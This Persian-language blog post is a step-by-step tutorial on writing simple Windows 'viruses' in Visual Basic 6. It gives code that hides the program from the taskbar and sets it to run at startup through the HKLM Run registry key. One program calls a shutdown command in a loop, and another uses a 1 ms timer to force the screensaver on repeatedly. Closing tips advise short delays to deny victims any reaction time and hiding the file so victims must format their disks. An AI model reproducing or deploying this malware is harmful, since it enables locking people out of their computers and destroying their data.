درس دوم( ایجاد یک ویروس ساده به کمک ویژوال بیسیک)

این برنامه (ویروس)ویندوز رو به حالت screen saver می بره ولی کاربر دیگه قادر نیست از screen saver
خارج بشه و مطمئن باشید راه دیگه ای بجز ری استارت سیستم نمی موند
خب برای شروع ابتدا این کد ها رو در قسمت   Generalفرم قرار دهید (کپی کنید)


Private Const SC_SCREEnSAVE = &HF140&
Private Const WM_SYSCOMMAND = &H112
Private Declare Function FindWindowA Lib "user32" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParm As Any) As Long
Sub ScreenSaver(blnScreenSaver As Boolean, Optional lHwnd As Long, Optional sFormCaption As String)
Dim lState As Long
If lHwnd = 0 Then
lHwnd = FindWindowA(vbNullString, sFormCaption)
End If
If blnScreenSaver Then
lState = 1
Else
lstat = -1
End If
Call SendMessage(lHwnd, WM_SYSCOMMAND, SC_SCREEnSAVE, lState)
End Sub

و در اخر یه timerبا قابلیت interval=1 به فرم اضافه کنید و کد های زیر را به فرم اضافه کنید(کپی کنید)


Private Sub Timer1_Timer()
Call ScreenSaver(Me.hWnd, Me.hWnd, -1)
End Sub

تو ضیحات:
۱-صرفا عاملی که بر نامه رو به یه شبه ویروس تبدیل می کنه وجوده تایمره با قابلیت intervalبسیار کم برای
گرفتن هر گونه قدرت عکس العمل از قربانی میگیره چون باعث میشه هربار که کاربر screen saver
را غیر فعال می کنه دوباره اونو اجرا کنه

۲-اگر چه یاداوری این مطلب را غیر ضروری می دونم ولی این کدها وربوط به ویژوال بیسیک است.

موفق باشید

نکته هایی برای بازدید کنندگان این وبلاگ

دوستان عزیز از شما خواهشمندم

برای اجرا و نوشتن ویروسها نیاز به برنامه visual Basic 6 دارید

نظر نظر یادتون نره

آموزش قدم به قدم ویروس نویسی با ویژوال بیسیک

به نام خدا

 

 

درس اول

ویروس نویسی

با توجه به اینکه عمده ویروس هایی که آموزش داده خواهند شد با ویژوال بیسیک طراحی شده اند به شما پیشنهاد می کنم اگه این برنامه را ندارید حتما تهیه کنید.

 

ویروس بلاستر(البته گفتنیه که این کدها مربوط به بلاستر واقعی نیست و فقط کارش شبیه اونه)

.فکر می کنم شما هم حتما با کدهای این ویروس اشنا هستید ولی امروز می خوام کد هایی را در کنار این ویروس یاد بدم سبب می شود این ویروس:.

 

1-پنهان باشد( نه در .....دیده بشه ونه فرم اون قابل دیدن باشه )

2-پس هر بار روشن شدن کامپیوتر بلافاصله دو باره آن را خاموش یا ریست کند

3-ویروس یاب ها ها قادر به شناسایی آن نبا شند

 

فکر می کنم ویژگی های گفته شده به تنهایی شمارا مجاب به امتحان ویروس می کنه

خوب بریم سراغ کدها:

ابتدا این کدها را در قسمت فرم کپی کنید(ویژوال بیسیک)

Private Sub Form_Load()

Shell "shutdown -s -t zz"

End Sub

نکات:

کد بالا مخصوص خاموش کردن رایانه ی قربانی است برای رستارت کردن باید بجای -sقرار بدین-r

می توانید بجایzzزمان لازم برای عمل کرد ویروس را قرار دهید(بر حسب ثانیه)

 

 برای پنهان کردنبرنامه باید عبارت زیر را درformوارد کنید.

App.TaskVisible = False
Me.Hide

 خط اول برای پنهان کردن برنامه در..taskbarو خط دوم برای پنهان فرم کردن از دید کاربره

 

۳-به نظر من مهمترین نیاز یک ویروسه اجرای اتو ماتیک ویروسه که کدهای زیر این نیاز را برطرف می کنه

Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"

حالاکد برنامه ی  شما باید مثل زیر باشد

Private Sub Form_Load()

Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN" & App.EXEName, App.Path & "" & App.EXEName & ".exe"

Shell "shutdown -s -t zz"

App.TaskVisible = False
Me.Hide

End sub

 

این برنامه با فشردن کلید.f5اجرا می شود ولی من توصیه می کنم اول فایل اجرایی آن را ذخیره و بعد اجرا کنید

 

 

نکات نهایی:

1- برای اینکه فرصت عکس العمل را از قربانی بگیرید زمان عملکرد ویروس را کمتر از5 ثانیه در نظر بگیرید

 

2-در صورتی که زمان عملکرد را بسیار کم در نظر گرفته اید هر گزان را اجرا نکنید چون اولین قربانی ویروس خود خواهید بود

3- اگر بتوانید ویروس رادر جایی غیر از درایو های اصلی قربانی قرار دهید قربانی برای نجات مجبور به formattکردن کل هارد می شود چون عملا این ویروس استفاده از ویندوز را غیر ممکن می سازد و اگر در درایو های فرعی باشد این بلا را سر سیستم عامل های تعویض شده هم می آورد.